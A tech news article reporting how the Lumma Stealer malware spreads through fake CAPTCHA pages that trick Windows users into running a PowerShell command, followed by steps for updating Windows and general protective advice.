We value your privacy

We use cookies to enhance your browsing experience, serve personalized ads or content, and analyze our traffic. By clicking "Accept All", you consent to our use of cookies.

Customize Consent Preferences

We use cookies to help you navigate efficiently and perform certain functions. You will find detailed information about all cookies under each consent category below.

The cookies that are categorized as "Necessary" are stored on your browser as they are essential for enabling the basic functionalities of the site. ... 

Always Active

Necessary cookies are required to enable the basic features of this site, such as providing secure log-in or adjusting your consent preferences. These cookies do not store any personally identifiable data.

No cookies to display.

Functional cookies help perform certain functionalities like sharing the content of the website on social media platforms, collecting feedback, and other third-party features.

No cookies to display.

Analytical cookies are used to understand how visitors interact with the website. These cookies help provide information on metrics such as the number of visitors, bounce rate, traffic source, etc.

No cookies to display.

Performance cookies are used to understand and analyze the key performance indexes of the website which helps in delivering a better user experience for the visitors.

No cookies to display.

Advertisement cookies are used to provide visitors with customized advertisements based on the pages you visited previously and to analyze the effectiveness of the ad campaigns.

No cookies to display.

NewApp Digest
search bot

Windows users are being tricked by sneaky malware scheme

October 14, 2024

In a concerning development for Windows users, security experts have identified a new strain of malware known as Lumma Stealer, which is being disseminated through deceptive human verification pages. This sophisticated scheme has been uncovered by researchers at Cloudsek, who detail how hackers exploit these fake verification pages to install malicious software on unsuspecting victims’ devices.

Understanding the Threat

The initial report from Palo Alto Networks’ Unit 42 highlighted the use of these fraudulent pages, which often mimic legitimate Google CAPTCHA interfaces. When users interact with these pages, they are misled into executing a PowerShell script that retrieves and installs the Lumma Stealer malware. Paul Michaud II, a threat hunter at Unit 42, explained that the process begins when victims click a button that prompts them to copy a PowerShell command into their system’s Run dialog.

Once executed, this command operates in a hidden window, fetching further instructions from a remote server. The malware is then downloaded in a file named “dengo.zip,” which, when unzipped and run, activates Lumma Stealer, allowing it to connect to domains controlled by the attackers. Researchers have noted that the malware can easily be replaced with other harmful files, increasing the risk for users.

Protecting Your System

To mitigate the risks associated with such malware, it is crucial for users to ensure that their Windows systems, browsers, and antivirus software are consistently updated. Regular software updates often include critical security patches that protect against known vulnerabilities. Here’s how to keep your Windows software up to date:

For Windows 10 and Windows 11

  • Click on the Start menu and select Settings (or press the Windows key + I).
  • In the Settings window, click on Update & Security.
  • Under the “Windows Update” section, click on Check for updates.
  • If updates are available, they will download and install automatically.
  • Restart your computer if prompted to apply the updates.

For Windows 8.1 and Earlier Versions

  • Open the Control Panel and navigate to System and Security.
  • Under the “Windows Update” section, click on Check for updates.
  • Select any available updates and click Install updates.
  • Follow the on-screen instructions to complete the installation.
  • Restart your computer if prompted.

Additional Protective Measures

To further safeguard against Lumma Stealer and similar threats, consider the following strategies:

  1. Utilize Robust Antivirus Software: A reliable antivirus program can detect and block threats before they inflict damage. Ensure it is installed on all devices.
  2. Scrutinize CAPTCHA Pages: Authentic Google CAPTCHA pages will not request file downloads or command executions. If something seems amiss, exit immediately.
  3. Avoid Running Unfamiliar Commands: Never execute commands that you do not fully understand, especially those copied from untrusted sources.
  4. Maintain Software Updates: Regularly update your operating system and applications to patch vulnerabilities.
  5. Implement Two-Factor Authentication (2FA): Enable 2FA on all accounts for an added layer of security against unauthorized access.

As cyber threats evolve, remaining vigilant and informed is essential for protecting personal and professional data. By adopting these practices, users can significantly reduce their risk of falling victim to sophisticated malware schemes like Lumma Stealer.

Tech Optimizer
Windows users are being tricked by sneaky malware scheme